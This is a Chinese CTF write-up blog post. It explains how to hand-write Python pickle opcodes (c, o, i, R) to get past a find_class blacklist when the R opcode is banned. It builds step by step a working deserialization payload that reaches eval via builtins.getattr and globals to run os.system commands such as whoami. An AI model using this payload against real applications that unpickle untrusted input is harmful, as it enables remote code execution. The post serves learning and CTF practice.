<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="手撸 opcode[TOC]
前言自己立的 flag，哭着也要完成不是，见上一篇文章 极客巅峰2021 web opcode，还是以这个题为例 opcode.tar.gz，在禁用了 R 指令的情况下绕过 find_class 黑名单的限制
推荐一篇文章 pickle反序列化初探 - 先知社区 (al">
    

    <!--Author-->
    
        <meta name="author" content="y0un9er">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="y0un9er&#39;s blog"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="y0un9er&#39;s blog"/>

    <!--Type page-->
    
        <meta property="og:type" content="website" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>y0un9er&#39;s blog</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.4.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    主页
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    档案
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    关于
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    标签
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    分类
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    链接
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2021/08/15/%E6%89%8B%E6%92%B8opcode/">
                Untitled
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2021-08-15</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h1 id="手撸-opcode"><a href="#手撸-opcode" class="headerlink" title="手撸 opcode"></a>手撸 opcode</h1><p>[TOC]</p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>自己立的 flag，哭着也要完成不是，见上一篇文章 <a target="_blank" rel="noopener" href="https://blog.csdn.net/CSDNiamcoming/article/details/119284636?spm=1001.2014.3001.5501">极客巅峰2021 web opcode</a>，还是以这个题为例 <a target="_blank" rel="noopener" href="https://download.csdn.net/download/CSDNiamcoming/20668182">opcode.tar.gz</a>，在禁用了 R 指令的情况下绕过 find_class 黑名单的限制</p>
<p>推荐一篇文章 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436">pickle反序列化初探 - 先知社区 (aliyun.com)</a>，真的写得太详细了，师傅很贴心的用了动图给我们观察栈的变化，还有每个指令的详细介绍，认真看完手撸完全不是问题</p>
<p>我这里主要是记录一下自己所学，完成 <strong>在禁用了 R 指令的情况下绕过 find_class 黑名单限制</strong> 的 payload，所以只着重介绍了一下 R、i、o 指令的用法，其他详细的 opcode 编写方法，还是请阅读推荐文章</p>
<h2 id="opcode-指令介绍"><a href="#opcode-指令介绍" class="headerlink" title="opcode 指令介绍"></a>opcode 指令介绍</h2><p>opcode 现在共六个版本，而高版本向低版本兼容，所以我们直接学习 v0 就行了，其他版本都有不可见字符，既不利于理解，也有可能造成不必要的麻烦</p>
<p>关于 find_class，当出现 c、i、b’\x93’（当然，v0 的话，b’\x93’ 就不用管了）时才会被触发</p>
<p>具体指令的介绍如下，这里只摘录一些会用到的指令，更多指令介绍请求前面介绍的文章中学习</p>
<table>
<thead>
<tr>
<th align="center">opcode</th>
<th align="center">描述</th>
<th align="center">写法</th>
<th align="center">栈变化</th>
</tr>
</thead>
<tbody><tr>
<td align="center">c</td>
<td align="center">获取一个全局对象或import一个模块</td>
<td align="center">c[module]\n[instance]\n</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="center">o</td>
<td align="center">寻找栈中的上一个MARK，以之间的第一个数据为callable<br />第二个参数到第n个数据为参数</td>
<td align="center">(c[module]\n[callable]\nS’arg1’\nS’arg2’\no.</td>
<td align="center">这个过程中涉及到的数据都出栈，函数返回值入栈</td>
</tr>
<tr>
<td align="center">R</td>
<td align="center">选择栈上的第一个对象作为函数、第二个对象作为参数（为元组），调用函数</td>
<td align="center">c[module]\n[callable]\n(S’arg’\ntR.</td>
<td align="center">函数和参数出栈，函数的返回值入栈</td>
</tr>
<tr>
<td align="center">i</td>
<td align="center">相当于c与o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数</td>
<td align="center">(S’arg1’\nS’arg2’\ni[module]\n[callablel]\n</td>
<td align="center">这个过程中涉及到的数据都出栈，函数返回值入栈</td>
</tr>
<tr>
<td align="center">S</td>
<td align="center">实例化一个字符串对象</td>
<td align="center">S‘string’</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="center">(</td>
<td align="center">向栈中压入一个MARK标记</td>
<td align="center">(</td>
<td align="center">MARK标记入栈</td>
</tr>
<tr>
<td align="center">t</td>
<td align="center">寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td align="center">(S’arg1’\nS’arg2’\nt</td>
<td align="center">MARK标记以及被组合的数据出栈获得对象入栈</td>
</tr>
<tr>
<td align="center">.</td>
<td align="center">程序结束，栈顶的元素作为pickle.loads()的返回值</td>
<td align="center">.</td>
<td align="center">无</td>
</tr>
</tbody></table>
<p>可用来调用函数的指令有 R、o、i，模板如下，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># __import__(&quot;builtins&quot;).print(&#x27;a&#x27;, &#x27;b&#x27;)</span></span><br><span class="line"></span><br><span class="line">R = <span class="string">b&#x27;&#x27;&#x27;cbuiltins</span></span><br><span class="line"><span class="string">print</span></span><br><span class="line"><span class="string">(S&#x27;a&#x27;</span></span><br><span class="line"><span class="string">S&#x27;b&#x27;</span></span><br><span class="line"><span class="string">tR.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">o = <span class="string">b&#x27;&#x27;&#x27;(cbuiltins</span></span><br><span class="line"><span class="string">print</span></span><br><span class="line"><span class="string">S&#x27;a&#x27;</span></span><br><span class="line"><span class="string">S&#x27;b&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">i = <span class="string">b&#x27;&#x27;&#x27;(S&#x27;a&#x27;</span></span><br><span class="line"><span class="string">S&#x27;b&#x27;</span></span><br><span class="line"><span class="string">ibuiltins</span></span><br><span class="line"><span class="string">print</span></span><br><span class="line"><span class="string">.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>上面的三个字符串反序列化的效果都是 <code>print(&#39;a&#39;, &#39;b&#39;)</code>，但是写法区别还是蛮大的，在分析栈变化情况前，我们先来看看值得注意的点</p>
<blockquote>
<ol>
<li>只有 i 指令中没有用到 c 指令，c 指令的作用是导入 模块中的实例，i 指令包含 导入和执行</li>
<li>没有指令可以直接导入 模块、实例等，必须是 模块加实例 的方式</li>
<li>三个指令的 “ ( ” （标记MARK）位置不同</li>
<li>R 指令的 MARK 标记在第一个参数的开始，用 t 指令将所有参数打包为 元组，传给 c 导入的函数</li>
<li>o 指令的 MARK 标记在 c 指令前，先选取前面两个字符串为 模块.函数，然后后面的都是参数</li>
<li>i 指令的 MARK 标记也在最前，标记为参数，然后 i 指令后面的两个字符串为 模块.函数</li>
</ol>
</blockquote>
<p>我们再来分析一下三个指令执行过程中栈的变化</p>
<blockquote>
<ol>
<li>R 指令：<ol>
<li>先将 builtins.print 压栈</li>
<li>再将 MARK 标记压栈</li>
<li>再将字符串 ‘a’、’b’ 分别压栈</li>
<li>执行 t 指令，将 ‘b’、’a’、MARK 出栈，有 MARK 出栈就会停止，组合为 (‘a’, ‘b’) 这样一个元组再入栈</li>
<li>执行 R 指令，(‘a’, ‘b’) 与 builtins.print 出栈，执行 print(‘a’, ‘b’)，结果压栈，即 print 的返回值 None</li>
</ol>
</li>
<li>o 指令<ol>
<li>先将 MARK 标记压栈</li>
<li>再将 builtins.print 压栈</li>
<li>再将 ‘a’、’b’ 分别压栈</li>
<li>执行 o 指令， ‘b’、’a’、builtins.print、MARK，分别出栈，执行 print(‘a’, ‘b’)，结果压栈</li>
</ol>
</li>
<li>i 指令<ol>
<li>先将 MARK 压栈</li>
<li>‘a’、’b’ 分别压栈</li>
<li>builtins.print 压栈</li>
<li>执行  print(‘a’, ‘b’)，结果压栈</li>
</ol>
</li>
</ol>
</blockquote>
<p>有时候 opcode 比较复杂，可能会被绕晕，这里有个工具 pickletools，其中 optimize 方法可以帮我们优化 opcode，dis 方法可以帮我们将 pickle 的符号化反汇编数据输出，效果如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"></span><br><span class="line">R = <span class="string">b&#x27;&#x27;&#x27;(cbuiltins</span></span><br><span class="line"><span class="string">print</span></span><br><span class="line"><span class="string">S&#x27;a&#x27;</span></span><br><span class="line"><span class="string">S&#x27;b&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(pickletools.optimize(R))</span><br><span class="line">pickletools.dis(R)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出</span></span><br><span class="line"><span class="comment"># b&quot;(cbuiltins\nprint\nS&#x27;a&#x27;\nS&#x27;b&#x27;\no.&quot;</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment">#     0: (    MARK</span></span><br><span class="line"><span class="comment">#     1: c        GLOBAL     &#x27;builtins print&#x27;</span></span><br><span class="line"><span class="comment">#    17: S        STRING     &#x27;a&#x27;</span></span><br><span class="line"><span class="comment">#    22: S        STRING     &#x27;b&#x27;</span></span><br><span class="line"><span class="comment">#    27: o        OBJ        (MARK at 0)</span></span><br><span class="line"><span class="comment">#    28: .    STOP</span></span><br><span class="line"><span class="comment"># highest protocol among opcodes = 1</span></span><br></pre></td></tr></table></figure>

<p>dis 方法很直观的给我们展现了 opcode 的执行方式，可以看到，o 指令找到了位置为 0 的 MARK，根据执行我们对 o 指令的了解，知道是执行了 builtins.print，参数为 ‘a’、’b’</p>
<h2 id="编写-payload"><a href="#编写-payload" class="headerlink" title="编写 payload"></a>编写 payload</h2><p><code>builtins.getattr(builtins, &#39;eval&#39;)(&quot;__import__(&#39;os&#39;).system(&#39;pwd&#39;)&quot;)</code> 这样子构造 payload，用到 c 指令导入的就只有 builtins.getattr 和 builtins，但是 builtins 并不能直接导入，所以需要去获取</p>
<p>获取 builtins 的 方式：<code>builtins.getattr(builtins.dict, &#39;get&#39;)(builtins.globals(), &#39;builtins&#39;)</code></p>
<p>也就是说，我们将 <code>builtins.getattr(builtins.getattr(builtins.dict, &#39;get&#39;)(builtins.globals(), &#39;builtins&#39;), &#39;eval&#39;)(&quot;__import__(&#39;os&#39;).system(&#39;pwd&#39;)&quot;)</code> 编写为不含 R 指令的 opcode，就可以达到绕过的目的了</p>
<blockquote>
<p>参考文章中绕过 find_class 的 payload</p>
<p>b’’’cbuiltins<br>getattr<br>p0<br>(cbuiltins<br>dict<br>S’get’<br>tRp1<br>cbuiltins<br>globals<br>)Rp2<br>00g1<br>(g2<br>S’builtins’<br>tRp3<br>0g0<br>(g3<br>S’eval’<br>tR(S’__import__(“os”).system(“whoami”)’<br>tR.<br>‘’’</p>
</blockquote>
<p>这个比较复杂，我们可以分步骤编写</p>
<p>首先是最外层的 <code>function(&quot;__import__(&#39;os&#39;).system(&#39;pwd&#39;)&quot;)</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;(</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">S&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>然后是外层的 builtins.getattr</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">arg1</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">S&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>继续完成 arg1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(function</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">arg1</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">S&#x27;builtins&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>function 的 arg1，这里是，使用 o 指令的话，没有参数就不用写，如果是 R 指令，需要用 ) 压入一个空元组</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(function</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(cbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;builtins&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>最后的 function，也就是内层的 builtins.getattr</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">cbuiltins</span></span><br><span class="line"><span class="string">dict</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">S&#x27;get&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">(cbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;builtins&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">o</span></span><br><span class="line"><span class="string">S&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>去掉多余的换行就是最终的 payload 了，可以看到，每个 c 指令的后面的都是 builtins，并且调用的实例并没有在黑名单中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b&#x27;&#x27;&#x27;((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">((cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">cbuiltins</span></span><br><span class="line"><span class="string">dict</span></span><br><span class="line"><span class="string">S&#x27;get&#x27;</span></span><br><span class="line"><span class="string">o(cbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">oS&#x27;builtins&#x27;</span></span><br><span class="line"><span class="string">oS&#x27;eval&#x27;</span></span><br><span class="line"><span class="string">oS&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>这里需要注意的是，在测试的时候如果没有导入 builtins，builtins.globals() 将返回 None，程序会报 <code>AttributeError: &#39;NoneType&#39; object has no attribute &#39;eval&#39;</code> 错误</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在学习过程中，发现手写的 opcode 真的可以干很多事儿，师傅们总结得已经很到位了，我这里就不献丑了</p>
<p>学习之前我还在想，没有 R 指令是不是不可以绕过，为什么题目不考，网上也没找到文章，学习之后发现，R 指令能做到的，i、o 指令都能做到                                                     </p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2021/08/15/%E6%89%8B%E6%92%B8opcode/">Untitled</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/14/page/">[object Object]</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/14/post/">[object Object]</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/14/hello-world/">Hello World</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/y0un9er">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    
                    
                    
                    
                    
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:vercode@163.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>